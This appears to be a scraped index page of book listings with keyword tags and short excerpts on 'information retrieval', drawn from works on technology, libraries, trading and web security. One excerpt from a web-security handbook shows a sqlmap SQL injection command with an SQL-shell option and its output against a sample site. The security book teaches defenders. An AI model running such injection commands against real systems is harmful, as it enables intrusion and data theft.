—than the founders and CEOs of immensely powerful tech firms that are first of all profit-seeking, market-monopolizing, consumer-craving commercial entities no more virtuous (or less virtuous) than oil or tobacco or weapons manufacturing firms. It should not really be a surprise that Apple will exploit cheap labor at its Foxconn subsidiary glass manufacturer in China or that Google will steer to the wind, allowing states like China to dictate the terms of “information retrieval” in their own domains. Or that the World Wide Web is being called the “walled-wide-web” by defenders of an open network who fear they are losing the battle. Dictators, nowadays mostly faltering or gone, are no longer the most potent threat to democracy: robust corporations are, not because they are enemies of popular sovereignty but because court decisions like Buckley v. Valeo and Citizens United have allowed them to shape and control popular sovereignty to advance their own interests.


pages: 189 words: 57,632

Content: Selected Essays on Technology, Creativity, Copyright, and the Future of the Future by Cory Doctorow

AltaVista, book scanning, Brewster Kahle, Burning Man, en.wikipedia.org, informal economy, information retrieval, Internet Archive, invention of movable type, Jeff Bezos, Law of Accelerating Returns, Metcalfe's law, Mitch Kapor, moral panic, mutually assured destruction, new economy, optical character recognition, patent troll, pattern recognition, peer-to-peer, Ponzi scheme, post scarcity, QWERTY keyboard, Ray Kurzweil, RFID, Sand Hill Road, Skype, slashdot, social software, speech recognition, Steve Jobs, Thomas Bayes, Turing test, Vernor Vinge

This sort of observational metadata is far more reliable than the stuff that human beings create for the purposes of having their documents found. It cuts through the marketing bullshit, the self-delusion, and the vocabulary collisions. Taken more broadly, this kind of metadata can be thought of as a pedigree: who thinks that this document is valuable? How closely correlated have this person's value judgments been with mine in times gone by? This kind of implicit endorsement of information is a far better candidate for an information-retrieval panacea than all the world's schema combined. Amish for QWERTY (Originally published on the O'Reilly Network, 07/09/2003) I learned to type before I learned to write. The QWERTY keyboard layout is hard-wired to my brain, such that I can't write anything of significance without that I have a 101-key keyboard in front of me. This has always been a badge of geek pride: unlike the creaking pen-and-ink dinosaurs that I grew up reading, I'm well adapted to the modern reality of technology.


pages: 144 words: 55,142

Interlibrary Loan Practices Handbook by Cherie L. Weible, Karen L. Janke

Firefox, information retrieval, Internet Archive, late fees, optical character recognition, pull request, QR code, transaction costs, Works Progress Administration

If an electronic resources management system is not available or used, it is important to find the interlibrary loan terms on a license and record this information in the ILL department. The terms of the license should be upheld. Regular communication with 41 42 lending workflow basics library staff who are responsible for licensing will ensure that ILL staff are aware of any new or updated license information. Retrieving the Item If the print item is owned and available, the call number or other location-specific information should be noted on the request. Borrowers might request a particular edition or year, so careful attention should be paid to make sure the call number and item are an exact match. All requests should be collected and sorted by location and the items pulled from the stacks at least daily.


pages: 190 words: 62,941

Wild Ride: Inside Uber's Quest for World Domination by Adam Lashinsky

"side hustle", Airbnb, always be closing, Amazon Web Services, autonomous vehicles, Ayatollah Khomeini, business process, Chuck Templeton: OpenTable:, cognitive dissonance, corporate governance, DARPA: Urban Challenge, Donald Trump, Elon Musk, gig economy, Golden Gate Park, Google X / Alphabet X, information retrieval, Jeff Bezos, Lyft, Marc Andreessen, Mark Zuckerberg, megacity, Menlo Park, new economy, pattern recognition, price mechanism, ride hailing / ride sharing, Sand Hill Road, self-driving car, Silicon Valley, Silicon Valley startup, Skype, Snapchat, South of Market, San Francisco, sovereign wealth fund, statistical model, Steve Jobs, TaskRabbit, Tony Hsieh, transportation-network company, Travis Kalanick, turn-by-turn navigation, Uber and Lyft, Uber for X, uber lyft, ubercab, young professional

It was what Camp later would refer to as a Web 1.0 experience. Still, the simplicity of the product masked the complexity of the software code necessary to build it. Camp was getting a master’s degree in software engineering, and though he and his friends bootstrapped StumbleUpon with their labor and little cash, their graduate research dovetailed with the product. Camp’s thesis was on “information retrieval through collaborative interface design and evolutionary algorithms.” Like Facebook, which began a few years later, StumbleUpon was a dorm-room success. It grew quickly to hundreds of thousands of users with Camp and his cofounders as the only employees. (Revenue would follow in later years with an early form of “native” advertising, full-page ads that would appear after several “stumbles,” or items users were discovering.)


pages: 222 words: 74,587

Paper Machines: About Cards & Catalogs, 1548-1929 by Markus Krajewski, Peter Krapp

business process, continuation of politics by other means, double entry bookkeeping, Frederick Winslow Taylor, Gödel, Escher, Bach, index card, Index librorum prohibitorum, information retrieval, invention of movable type, invention of the printing press, Jacques de Vaucanson, Johann Wolfgang von Goethe, Joseph-Marie Jacquard, knowledge worker, means of production, new economy, paper trading, Turing machine

Paper Machines History and Foundations of Information Science Edited by Michael Buckland, Jonathan Furner, and Markus Krajewski Human Information Retrieval by Julian Warner Good Faith Collaboration: The Culture of Wikipedia by Joseph Michael Reagle Jr. Paper Machines: About Cards & Catalogs, 1548–1929 by Markus Krajewski Paper Machines About Cards & Catalogs, 1548–1929 Markus Krajewski translated by Peter Krapp The MIT Press Cambridge, Massachusetts London, England © 2011 Massachusetts Institute of Technology © für die deutsche Ausgabe 2002, Kulturverlag Kadmos Berlin All rights reserved. No part of this book may be reproduced in any form by any electronic or mechanical means (including photocopying, recording, or information storage and retrieval) without permission in writing from the publisher.


pages: 245 words: 64,288

Robots Will Steal Your Job, But That's OK: How to Survive the Economic Collapse and Be Happy by Pistono, Federico

3D printing, Albert Einstein, autonomous vehicles, bioinformatics, Buckminster Fuller, cloud computing, computer vision, correlation does not imply causation, en.wikipedia.org, epigenetics, Erik Brynjolfsson, Firefox, future of work, George Santayana, global village, Google Chrome, happiness index / gross national happiness, hedonic treadmill, illegal immigration, income inequality, information retrieval, Internet of things, invention of the printing press, jimmy wales, job automation, John Markoff, Kevin Kelly, Khan Academy, Kickstarter, knowledge worker, labor-force participation, Lao Tzu, Law of Accelerating Returns, life extension, Loebner Prize, longitudinal study, means of production, Narrative Science, natural language processing, new economy, Occupy movement, patent troll, pattern recognition, peak oil, post scarcity, QR code, race to the bottom, Ray Kurzweil, recommendation engine, RFID, Rodney Brooks, selection bias, self-driving car, slashdot, smart cities, software as a service, software is eating the world, speech recognition, Steven Pinker, strong AI, technological singularity, Turing test, Vernor Vinge, women in the workforce

While our brains will stay pretty much the same for the next 20 years, computer’s efficiency and computational power will have doubled about twenty times. That is a million-fold increase. So, for the same $3 million you will have a computer a million times more powerful than Watson, or you could have a Watson-equivalent computer for $3. Watson’s computational power and exceptional skills of advanced Natural Language Processing, Information Retrieval, Knowledge Representation and Reasoning, Machine Learning, and open domain question answering are already being put to better use than showing off at a TV contest. IBM and Nuance Communications Inc. are partnering for the research project to develop a commercial product during the next 18 to 24 months that will exploit Watson’s capabilities as a clinical decision support system to aid the diagnosis and treatment of patients.86 Recall the example of automated radiologists we mentioned earlier.


pages: 222 words: 70,132

Move Fast and Break Things: How Facebook, Google, and Amazon Cornered Culture and Undermined Democracy by Jonathan Taplin

1960s counterculture, affirmative action, Affordable Care Act / Obamacare, Airbnb, Amazon Mechanical Turk, American Legislative Exchange Council, Apple's 1984 Super Bowl advert, back-to-the-land, barriers to entry, basic income, battle of ideas, big data - Walmart - Pop Tarts, bitcoin, Brewster Kahle, Buckminster Fuller, Burning Man, Clayton Christensen, commoditize, creative destruction, crony capitalism, crowdsourcing, data is the new oil, David Brooks, David Graeber, don't be evil, Donald Trump, Douglas Engelbart, Douglas Engelbart, Dynabook, Edward Snowden, Elon Musk, equal pay for equal work, Erik Brynjolfsson, future of journalism, future of work, George Akerlof, George Gilder, Google bus, Hacker Ethic, Howard Rheingold, income inequality, informal economy, information asymmetry, information retrieval, Internet Archive, Internet of things, invisible hand, Jaron Lanier, Jeff Bezos, job automation, John Markoff, John Maynard Keynes: technological unemployment, John von Neumann, Joseph Schumpeter, Kevin Kelly, Kickstarter, labor-force participation, life extension, Marc Andreessen, Mark Zuckerberg, Menlo Park, Metcalfe’s law, Mother of all demos, move fast and break things, move fast and break things, natural language processing, Network effects, new economy, Norbert Wiener, offshore financial centre, packet switching, Paul Graham, paypal mafia, Peter Thiel, plutocrats, Plutocrats, pre–internet, Ray Kurzweil, recommendation engine, rent-seeking, revision control, Robert Bork, Robert Gordon, Robert Metcalfe, Ronald Reagan, Ross Ulbricht, Sam Altman, Sand Hill Road, secular stagnation, self-driving car, sharing economy, Silicon Valley, Silicon Valley ideology, smart grid, Snapchat, software is eating the world, Steve Jobs, Stewart Brand, technoutopianism, The Chicago School, The Market for Lemons, The Rise and Fall of American Growth, Tim Cook: Apple, trade route, transfer pricing, Travis Kalanick, trickle-down economics, Tyler Cowen: Great Stagnation, universal basic income, unpaid internship, We wanted flying cars, instead we got 140 characters, web application, Whole Earth Catalog, winner-take-all economy, women in the workforce, Y Combinator

When the show started it was as if Engelbart had arrived from the future, “dealing lightning with both hands.” The effect on the thousand people gathered for the conference was revolutionary. Imagine the first performance of Stravinsky’s The Rite of Spring but without the boos and walkouts. People were thunderstruck by this radical upending of what a computer could be. No longer a giant calculation machine, it was a personal tool of communication and information retrieval. 2. It is not an exaggeration to say that the work of Steve Jobs, Bill Gates, Larry Page, and Mark Zuckerberg stands on the shoulders of Doug Engelbart. Yet Engelbart’s vision of the computing future was different from today’s reality. In the run-up to the demonstration, Bill English had enlisted the help of Whole Earth Catalog publisher Stewart Brand, who had produced the Acid Tests with Ken Kesey two years earlier.


pages: 244 words: 66,599

Insanely Great: The Life and Times of Macintosh, the Computer That Changed Everything by Steven Levy

Apple II, Apple's 1984 Super Bowl advert, computer age, conceptual framework, Douglas Engelbart, Douglas Engelbart, Dynabook, Howard Rheingold, HyperCard, information retrieval, information trail, John Markoff, Kickstarter, knowledge worker, Marshall McLuhan, Mitch Kapor, Mother of all demos, Productivity paradox, QWERTY keyboard, rolodex, Silicon Valley, skunkworks, speech recognition, Steve Jobs, Steve Wozniak, Steven Levy, Ted Nelson, the medium is the message, Vannevar Bush

That was the intangible benefit of HyperCard-a hastening of what now seems an inevitable reordering of the way we consume information. On a more basic level, HyperCard found several niches, the most prevalent being an easy-to-use control panel, or "front end," for databases, providing easy access for files, pictures, notes, and video clips that otherwise would be elusive to those unschooled in the black arts of information retrieval. Thus it became associated with another use of Macintosh that would become central to the computer's role in nudging digital technology a little closer to the familiar: multimedia. In recent years multimedia has taken on a negative connotation in the computer industry. The term is often used with a suspicious fuzziness, and is often dismissed as a meaningless buzzword, tainted by hucksters invoking the word to move new hardware.


pages: 671 words: 228,348

Pro AngularJS by Adam Freeman

business process, create, read, update, delete, en.wikipedia.org, Google Chrome, information retrieval, inventory management, MVC pattern, place-making, premature optimization, revision control, Ruby on Rails, single page application, web application

For the URL, I specified productData.json. A URL like this will be a requested relative to the main HTML document, which means that I don’t have to hard-code protocols, hostnames, and ports into the application. GET AND POST: PICK THE RIGHT ONE The rule of thumb is that GET requests should be used for all read-only information retrieval, while POST requests should be used for any operation that changes the application state. In standards-compliance terms, GET requests are for safe interactions (having no side effects besides information retrieval), and POST requests are for unsafe interactions (making a decision or changing something). These conventions are set by the World Wide Web Consortium (W3C), at www.w3.org/Protocols/rfc2616/rfc2616-sec9.html. GET requests are addressable—all the information is contained in the URL, so it’s possible to bookmark and link to these addresses.


pages: 1,164 words: 309,327

Trading and Exchanges: Market Microstructure for Practitioners by Larry Harris

active measures, Andrei Shleifer, asset allocation, automated trading system, barriers to entry, Bernie Madoff, business cycle, buttonwood tree, buy and hold, compound rate of return, computerized trading, corporate governance, correlation coefficient, data acquisition, diversified portfolio, fault tolerance, financial innovation, financial intermediation, fixed income, floating exchange rates, High speed trading, index arbitrage, index fund, information asymmetry, information retrieval, interest rate swap, invention of the telegraph, job automation, law of one price, London Interbank Offered Rate, Long Term Capital Management, margin call, market bubble, market clearing, market design, market fragmentation, market friction, market microstructure, money market fund, Myron Scholes, Nick Leeson, open economy, passive investing, pattern recognition, Ponzi scheme, post-materialism, price discovery process, price discrimination, principal–agent problem, profit motive, race to the bottom, random walk, rent-seeking, risk tolerance, risk-adjusted returns, selection bias, shareholder value, short selling, Small Order Execution System, speech recognition, statistical arbitrage, statistical model, survivorship bias, the market place, transaction costs, two-sided market, winner-take-all economy, yield curve, zero-coupon bond, zero-sum game

The price will rise as others come to the same opinion, and it will surely rise when Exxon Mobil makes its announcement. In contrast, if the manager wants to buy the stock because he believes that it is fundamentally undervalued, Bob can be more patient. The prices of such stocks usually do not rise so quickly that Bob needs to hurry to trade. The portfolio manager says that he wants to buy Exxon Mobil because he believes it is fundamentally undervalued. Bob then uses an electronic information retrieval system to examine the recent price and trade history for Exxon Mobil. He looks to see whether other traders are trying to fill large orders. If a large seller is pushing prices down, Bob might be able to fill his order quickly at a good price. If Bob must compete with another large buyer, the order may be hard to execute at a good price. Falling prices often indicate that large buys will be easier to fill than large sells.

Most national regulatory agencies throughout the world have similar powers. In addition to their regulatory functions, the SEC and CFTC collect and disseminate information useful to traders, investors, speculators, and legislators. The SEC collects various financial reports from issuers and position reports from large traders. Investors who are interested in estimating security values can access these reports over the Internet via the SEC’s Edgar information retrieval system. The CFTC likewise collects and publishes information about commodity market supply and demand conditions and large trader positions. Traders use this information to value commodities and to forecast what other traders might do in the future. Both organizations also provide information to Congress through their regular annual reports, their special reports on specific issues, their testimony at congressional hearings, and their responses to requests for information from members of Congress and their staffs.

Bill also starts posting notes to the Internet bulletin boards about the importance of the China information. His notes now project price targets of 20 and 25 dollars per share, with the possibility of more than 50 dollars a share by the time the new plant comes on line. 12.1.1 The Successful Ending: Bill Profits Some traders who follow BNB closely see the price change. They immediately query their electronic information retrieval services to determine why the stock is moving, and when it started to move. They find the story about producing in China and see that the price increase immediately followed its publication. Although the news has no particular fundamental value, many traders infer more from the story than they should because of the large positive price change that followed the announcement. They mistakenly conclude that other traders believe the story is extremely good news.


pages: 1,302 words: 289,469

The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws by Dafydd Stuttard, Marcus Pinto

call centre, cloud computing, commoditize, database schema, defense in depth, easy for humans, difficult for computers, Firefox, information retrieval, lateral thinking, MITM: man-in-the-middle, MVC pattern, optical character recognition, Ruby on Rails, Turing test, web application

Ensure that you configure your tools with this fact in mind. Application Pages Versus Functional Paths The enumeration techniques described so far have been implicitly driven by one particular picture of how web application content may be conceptualized and cataloged. This picture is inherited from the pre-application days of the World Wide Web, in which web servers functioned as repositories of static information, retrieved using URLs that were effectively filenames. To publish some web content, an author simply generated a bunch of HTML files and copied these into the relevant directory on a web server. When users followed hyperlinks. 94 Chapter 4 Mapping the Application they navigated the set of files created by the author, requesting each file via its name within the directory tree residing on the server.

Many of these are specifically geared toward MS-SQL, and many have ceased active development and have been overtaken by new techniques and developments in SQL injection. The authors' favorite is sqlmap, which can attack MySQL, Oracle, and MS-SQL, among others. It implements UNiON-based and inference-based retrieval. It supports various escalation methods, including retrieval of files from the operating system, and command execution under Windows using xp_cmdshell. In practice, sqlmap is an effective tool for database information retrieval through time-delay or other inference methods and can be useful for union-based retrieval. One of the best ways to use it is with the --sql-sheli option. This gives the attacker a SQL prompt and performs the necessary union, error-based, or blind SQL injection behind the scenes to send and retrieve results. For example: C:\sqlmap>sqlmap.py -u http://wahh-app.com/employees?Empno=7369 --union-use --sql-shell -p Empno sqlmap/0.8 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:54:39 [14:54:39] [INFO] using 'C:\sqlmap\output\wahh-app.com\session' as session file [14:54:39] [INFO] testing connection to the target url [14:54:40] [WARNING] the testable parameter 'Empno' you provided is not Chapter 9 ■ Attacking Data Stores 551 into the Cookie [14:54:40] [INFO] [14:54:44] [INFO] [14:54:44] [INFO] parenthesis [14:54:44] [INFO] 'Empno' [14:54:46] [INFO] parameter 'Empno' [14:54:47] [INFO] testing if the url is stable, wait a few seconds url is stable testing sgl injection on GET parameter 'Empno' with 0 testing unescaped numeric injection on GET parameter confirming unescaped numeric injection on GET GET parameter 'Empno' is unescaped numeric injectable with 0 parenthesis [14:54:47] [INFO] testing for parenthesis on injectable parameter [14:54:50] [INFO] the injectable parameter requires 0 parenthesis [14:54:50] [INFO] testing MySQL [14:54:51] [WARNING] the back-end DMBS is not MySQL [14:54:51] [INFO] testing Oracle [14:54:52] [INFO] confirming Oracle [14:54:53] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2000 web application technology: ASP, Microsoft IIS 5.0 back-end DBMS: Oracle [14:54:53] [INFO] testing inband sql injection on parameter 'Empno' with NULL bruteforcing technique [14:54:58] [INFO] confirming full inband sql injection on parameter 'Empno' [14:55:00] [INFO] the target url is affected by an exploitable full inband sgl injection vulnerability valid union: 'http://wahh-app.com:80/employees.asp?

/default/fedefault.aspx SessionUser.Key f7e50aef8fadd30f31f3aeal04cef26ed2ce2be50073c SessionClient.ID 306 SessionClient.ReviewID 245 UPriv.2100 Chapter 15 i Exploiting Information Disclosure 619 SessionUser.NetworkLevelUser 0 UPriv.2200 SessionUser.BranchLevelUser 0 SessionDatabase fd219.prod.wahh-bank.com The following items are commonly included in verbose debug messages: ■ Values of key session variables that can be manipulated via user input ■ Hostnames and credentials for back-end components such as databases ■ File and directory names on the server ■ Information embedded within meaningful session tokens (see Chapter 7) ■ Encryption keys used to protect data transmitted via the client (see Chapter 5) ■ Debug information for exceptions arising in native code components, including the values of CPU registers, contents of the stack, and a list of the loaded DLLs and their base addresses (see Chapter 16) When this kind of error reporting functionality is present in live production code, it may signify a critical weakness in the application's security. You should review it closely to identify any items that can be used to further advance your attack, and any ways in which you can supply crafted input to manipulate the application's state and control the information retrieved. Server and Database Messages Informative error messages are often returned not by the application itself but by some back-end component such as a database, mail server, or SOAP server. If a completely unhandled error occurs, the application typically responds with an HTTP 500 status code, and the response body may contain further information about the error. In other cases, the application may handle the error gracefully and return a customized message to the user, sometimes including error information generated by the back-end component.


pages: 242 words: 245

The New Ruthless Economy: Work & Power in the Digital Age by Simon Head

Asian financial crisis, business cycle, business process, call centre, conceptual framework, deskilling, Erik Brynjolfsson, Ford paid five dollars a day, Frederick Winslow Taylor, informal economy, information retrieval, medical malpractice, new economy, Panopticon Jeremy Bentham, shareholder value, Shoshana Zuboff, Silicon Valley, single-payer health, supply-chain management, telemarketer, Thomas Davenport, Toyota Production System, union organizing

Whalen and Vinkhuyzen were told that the company *Vas reluctant to invest in training or support for customer service representatives, that would increase their knowledgeability." Instead, the company believed that "reducing dependency on people knowledge and skills through expert and artificial intelligence systems" offered the best approach. With the expert system containing "most, if not all, of the knowledge required to perform a task or solve a problem," the knowledgeability of the agent could be confined "largely to data entry and information retrieval procedures"—echoes of Hammer and Champy's deal structurers and case managers.29 The chief KM problem faced by MMR's software engineers was how to achieve an accurate definition of the problem to be solved by CasePoint. The one thing the expert system could not do was provide for itself an accurate description of the symptoms of machine breakdown. But without such an accurate description to work with, CasePoint could not embark upon its "case reasoning" to come up with the correct solution to the problem.


pages: 242 words: 71,938

The Google Resume: How to Prepare for a Career and Land a Job at Apple, Microsoft, Google, or Any Top Tech Company by Gayle Laakmann Mcdowell

barriers to entry, cloud computing, game design, information retrieval, job-hopping, side project, Silicon Valley, Steve Jobs, why are manhole covers round?

They provide just the right amount of detail to be useful, without overwhelming the reader. 10. The one thing that would make this slightly stronger is for Bill to list the dates of the projects. Distributed Hash Table (Language/Platform: Java/Linux) Successfully implemented Distributed Hash Table based on chord lookup protocol, Chord protocol is one solution for connecting the peers of a P2P network. Chord consistently maps a key onto a node. Information Retrieval System (Language/Platform: Java/Linux) Developed an indexer to index corpus of file and a Query Processor to process the Boolean query. The Query Processor outputs the file name, title, line number, and word position. Implemented using Java API such as serialization and collections (Sortedset, Hashmaps). Achievements Won Star Associate Award at Capgemini for outstanding performance. Received client appreciation for increasing productivity by developing Batch Stat Automation tool. 11.


pages: 238 words: 77,730

Final Jeopardy: Man vs. Machine and the Quest to Know Everything by Stephen Baker

23andMe, AI winter, Albert Einstein, artificial general intelligence, business process, call centre, clean water, commoditize, computer age, Frank Gehry, information retrieval, Iridium satellite, Isaac Newton, job automation, pattern recognition, Ray Kurzweil, Silicon Valley, Silicon Valley startup, statistical model, theory of mind, thinkpad, Turing test, Vernor Vinge, Wall-E, Watson beat the top human players on Jeopardy!

And the brain appears to busy itself with this internal dispute instead of systematically trawling for the most promising clues and pathways. Researchers at Harvard, studying the brain scans of people suffering from tip of the tongue syndrome, have noted increased activity in the anterior cingulate—a part of the brain behind the frontal lobe, devoted to conflict resolution and detecting surprise. Few of these conflicts appeared to interfere with Jennings’s information retrieval. During his unprecedented seventy-four-game streak, he routinely won the buzz on more than half the clues. And his snap judgments that the answers were on call in his head somewhere led him to a remarkable 92 percent precision rate, according to statistics compiled by the quiz show’s fans. This topped the average champion by 10 percent. As IBM’s scientists contemplated building a machine that could compete with the likes of Ken Jennings, they understood their constraints.


pages: 345 words: 75,660

Prediction Machines: The Simple Economics of Artificial Intelligence by Ajay Agrawal, Joshua Gans, Avi Goldfarb

"Robert Solow", Ada Lovelace, AI winter, Air France Flight 447, Airbus A320, artificial general intelligence, autonomous vehicles, basic income, Bayesian statistics, Black Swan, blockchain, call centre, Capital in the Twenty-First Century by Thomas Piketty, Captain Sullenberger Hudson, collateralized debt obligation, computer age, creative destruction, Daniel Kahneman / Amos Tversky, data acquisition, data is the new oil, deskilling, disruptive innovation, Elon Musk, en.wikipedia.org, Erik Brynjolfsson, everywhere but in the productivity statistics, Google Glasses, high net worth, ImageNet competition, income inequality, information retrieval, inventory management, invisible hand, job automation, John Markoff, Joseph Schumpeter, Kevin Kelly, Lyft, Minecraft, Mitch Kapor, Moneyball by Michael Lewis explains big data, Nate Silver, new economy, On the Economy of Machinery and Manufactures, pattern recognition, performance metric, profit maximization, QWERTY keyboard, race to the bottom, randomized controlled trial, Ray Kurzweil, ride hailing / ride sharing, Second Machine Age, self-driving car, shareholder value, Silicon Valley, statistical model, Stephen Hawking, Steve Jobs, Steven Levy, strong AI, The Future of Employment, The Signal and the Noise by Nate Silver, Tim Cook: Apple, Turing test, Uber and Lyft, uber lyft, US Airways Flight 1549, Vernor Vinge, Watson beat the top human players on Jeopardy!, William Langewiesche, Y Combinator, zero-sum game

To be mobile-first is to drive traffic to your mobile experience and optimize consumers’ interfaces for mobile even at the expense of your full website and other platforms. The last part is what makes it strategic. “Do well on mobile” is something to aim for. But saying you will do so even if it harms other channels is a real commitment. What does this mean in the context of AI-first? Google’s research director Peter Norvig gives an answer: With information retrieval, anything over 80% recall and precision is pretty good—not every suggestion has to be perfect, since the user can ignore the bad suggestions. With assistance, there is a much higher barrier. You wouldn’t use a service that booked the wrong reservation 20% of the time, or even 2% of the time. So an assistant needs to be much more accurate, and thus more intelligent, more aware of the situation.


Mastering Structured Data on the Semantic Web: From HTML5 Microdata to Linked Open Data by Leslie Sikos

AGPL, Amazon Web Services, bioinformatics, business process, cloud computing, create, read, update, delete, Debian, en.wikipedia.org, fault tolerance, Firefox, Google Chrome, Google Earth, information retrieval, Infrastructure as a Service, Internet of things, linked data, natural language processing, openstreetmap, optical character recognition, platform as a service, search engine result page, semantic web, Silicon Valley, social graph, software as a service, SPARQL, text mining, Watson beat the top human players on Jeopardy!, web application, wikimedia commons

Oracle (2015) Oracle Spatial and Graph. www.oracle.com/technetwork/database/ options/spatialandgraph/overview/index.html. Accessed 10 April 2015. 11. SYSTAP LLC (2015) Blazegraph. www.blazegraph.com/bigdata. Accessed 10 April 2015. Chapter 7 Querying While machine-readable datasets are published primarily for software agents, automatic data extraction is not always an option. Semantic Information Retrieval often involves users searching for the answer to a complex question, based on the formally represented knowledge in a dataset or database. While Structured Query Language (SQL) is used to query relational databases, querying graph databases and flat Resource Description Framework (RDF) files can be done using the SPARQL Protocol and RDF Query Language (SPARQL), the primary query language of RDF, which is much more powerful than SQL.


Deep Work: Rules for Focused Success in a Distracted World by Cal Newport

8-hour work day, Albert Einstein, barriers to entry, business climate, Cal Newport, Capital in the Twenty-First Century by Thomas Piketty, Clayton Christensen, David Brooks, David Heinemeier Hansson, deliberate practice, disruptive innovation, Donald Knuth, Donald Trump, Downton Abbey, en.wikipedia.org, Erik Brynjolfsson, experimental subject, follow your passion, Frank Gehry, informal economy, information retrieval, Internet Archive, Jaron Lanier, knowledge worker, Mark Zuckerberg, Marshall McLuhan, Merlin Mann, Nate Silver, new economy, Nicholas Carr, popular electronics, remote working, Richard Feynman, Ruby on Rails, Silicon Valley, Silicon Valley startup, Snapchat, statistical model, the medium is the message, Watson beat the top human players on Jeopardy!, web application, winner-take-all economy, zero-sum game

If you find yourself glued to a smartphone or laptop throughout your evenings and weekends, then it’s likely that your behavior outside of work is undoing many of your attempts during the workday to rewire your brain (which makes little distinction between the two settings). In this case, I would suggest that you maintain the strategy of scheduling Internet use even after the workday is over. To simplify matters, when scheduling Internet use after work, you can allow time-sensitive communication into your offline blocks (e.g., texting with a friend to agree on where you’ll meet for dinner), as well as time-sensitive information retrieval (e.g., looking up the location of the restaurant on your phone). Outside of these pragmatic exceptions, however, when in an offline block, put your phone away, ignore texts, and refrain from Internet usage. As in the workplace variation of this strategy, if the Internet plays a large and important role in your evening entertainment, that’s fine: Schedule lots of long Internet blocks. The key here isn’t to avoid or even to reduce the total amount of time you spend engaging in distracting behavior, but is instead to give yourself plenty of opportunities throughout your evening to resist switching to these distractions at the slightest hint of boredom.


Mastering Book-Keeping: A Complete Guide to the Principles and Practice of Business Accounting by Peter Marshall

accounting loophole / creative accounting, asset allocation, double entry bookkeeping, information retrieval, intangible asset, the market place

Tel: (01865) 375794. Fax: (01865) 379162. info@howtobooks.co.uk www.howtobooks.co.uk © 2009 Dr Peter Marshall First edition 1992 Second edition 1995 Third edition 1997 Fourth edition 1999 Fifth edition 2001 Sixth edition 2003 Seventh edition 2005 Reprinted 2006 Eighth edition 2009 First published in electronic form 2009 All rights reserved. No part of this work may be reproduced or stored in an information retrieval system (other than for purposes of review) without the express permission of the publisher in writing. The rights of Peter Marshall to be identified as the author this work has been asserted by him in accordance with the Copyright Designs and Patents Act 1988. British Library Cataloguing in Publication Data A catalogue record for this book is available from the British Library ISBN 978 1 84803 324 5 Produced for How To Books by Deer Park Productions, Tavistock, Devon Typeset by PDQ Typesetting, Newcastle-under-Lyme, Staffordshire Cover design by Baseline Arts Ltd, Oxford NOTE: The material contained in this book is set out in good faith for general guidance and no liability can be accepted for loss or expense incurred as a result of relying in particular circumstances on statements made in the book.


pages: 411 words: 80,925

What's Mine Is Yours: How Collaborative Consumption Is Changing the Way We Live by Rachel Botsman, Roo Rogers

Airbnb, barriers to entry, Bernie Madoff, bike sharing scheme, Buckminster Fuller, buy and hold, carbon footprint, Cass Sunstein, collaborative consumption, collaborative economy, commoditize, Community Supported Agriculture, credit crunch, crowdsourcing, dematerialisation, disintermediation, en.wikipedia.org, experimental economics, George Akerlof, global village, hedonic treadmill, Hugh Fearnley-Whittingstall, information retrieval, iterative process, Kevin Kelly, Kickstarter, late fees, Mark Zuckerberg, market design, Menlo Park, Network effects, new economy, new new economy, out of africa, Parkinson's law, peer-to-peer, peer-to-peer lending, peer-to-peer rental, Ponzi scheme, pre–internet, recommendation engine, RFID, Richard Stallman, ride hailing / ride sharing, Robert Shiller, Robert Shiller, Ronald Coase, Search for Extraterrestrial Intelligence, SETI@home, Simon Kuznets, Skype, slashdot, smart grid, South of Market, San Francisco, Stewart Brand, The Nature of the Firm, The Spirit Level, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, Thorstein Veblen, Torches of Freedom, transaction costs, traveling salesman, ultimatum game, Victor Gruen, web of trust, women in the workforce, Zipcar

This section was heavily influenced by Richard Grants, “Drowning in Plastic: The Great Pacific Garbage Patch Is Twice the Size of France,” Telegraph (April 24, 2009), www.telegraph.co.uk/earth/environment/5208645/Drowning-in-plastic-The-Great-Pacific-Garbage-Patch-is-twice-the-size-of-France.html. 5. Statistics on annual consumption of plastic materials come from “Plastics Recycling Information.” Retrieved August 2009, www.wasteonline.org.uk/resources/InformationSheets/Plastics.htm. 6. Thomas M. Kostigen, “The World’s Largest Dump: The Great Pacific Garbage Patch,” Discover Magazine (July 10, 2008), http://discovermagazine.com/2008/jul/10-the-worlds-largest-dump. 7. Paul Hawken, Amory Lovins, and L. Hunter Lovins, Natural Capitalism (Rocky Mountain Institute, 1999), 4, www.natcap.org/sitepages/pid5.php. 8.


Writing Effective Use Cases by Alistair Cockburn

business process, c2.com, create, read, update, delete, finite state, index card, information retrieval, iterative process, recommendation engine, Silicon Valley, web application

The shopper passes a point that the web site owner has predetermined to generate sales leads (dynamic business rule): System generates sales lead. 2e. System has been setup to require the Shopper to identify themselves: Shopper establishes identity 2f. System is setup to interact with known other systems (parts inventory, process & planning) that will affect product availability and selection: 2f.1. System interacts with known other systems (parts inventory, process & planning) to get the needed information. (Retrieve Part Availability, Retrieve Build Schedule). 2f.2. System uses the results to filter or show availability of product and/or options(parts). 2g. Shopper was presented and selects a link to an Industry related web-site: Shopper views other web-site. 2h. System is setup to interact with known Customer Information System: 2h.1. System retrieves customer information from Customer Information System 2h.2.


pages: 791 words: 85,159

Social Life of Information by John Seely Brown, Paul Duguid

business process, Claude Shannon: information theory, computer age, cross-subsidies, disintermediation, double entry bookkeeping, Frank Gehry, frictionless, frictionless market, future of work, George Gilder, George Santayana, global village, Howard Rheingold, informal economy, information retrieval, invisible hand, Isaac Newton, John Markoff, Just-in-time delivery, Kenneth Arrow, Kevin Kelly, knowledge economy, knowledge worker, lateral thinking, loose coupling, Marshall McLuhan, medical malpractice, moral hazard, Network effects, new economy, Productivity paradox, Robert Metcalfe, rolodex, Ronald Coase, shareholder value, Shoshana Zuboff, Silicon Valley, Steve Jobs, Superbowl ad, Ted Nelson, telepresence, the medium is the message, The Nature of the Firm, The Wealth of Nations by Adam Smith, Thomas Malthus, transaction costs, Turing test, Vannevar Bush, Y2K

